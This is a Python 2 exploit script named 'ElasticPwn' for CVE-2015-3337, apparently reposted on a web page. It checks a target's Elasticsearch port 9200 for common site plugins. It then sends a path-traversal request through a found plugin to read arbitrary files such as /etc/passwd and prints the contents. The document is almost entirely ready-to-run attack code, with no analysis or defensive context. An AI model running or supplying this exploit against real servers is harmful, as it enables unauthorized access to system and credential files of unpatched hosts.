|
import socket, sys
print "!dSR ElasticPwn - for CVE-2015-3337\n"
if len(sys.argv) <> 3:
print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]
sys.exit()
port = 9200
host = sys.argv[1]
fpath = sys.argv[2]
def grab(plugin):
socket.setdefaulttimeout(3)
s = socket.socket()
s.connect((host,port))
s.send("GET /_plugin/%s/../../../../../..%s HTTP/1.0\n"
"Host: %s\n\n" % (plugin, fpath, host))
file = s.recv(2048)
print " [*] Trying to retrieve %s:" % fpath
if ("HTTP/1.0 200 OK" in file):
print "\n%s" % file
else:
print "[-] File Not Found, No Access Rights or System Not Vulnerable"
def pfind(plugin):
try:
socket.setdefaulttimeout(3)
s = socket.socket()
s.connect((host,port))
s.send("GET /_plugin/%s/ HTTP/1.0\n"
"Host: %s\n\n" % (plugin, host))
file = s.recv(16)
print "[*] Trying to find plugin %s:" % plugin
if ("HTTP/1.0 200 OK" in file):
print "[+] Plugin found!"
grab(plugin)
sys.exit()
else:
print "[-] Not Found "
except Exception, e:
print "[-] Error connecting to %s: %s" % (host, e)
sys.exit()
pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']
for plugin in pluginList:
pfind(plugin)
|
推荐
评论(0条)
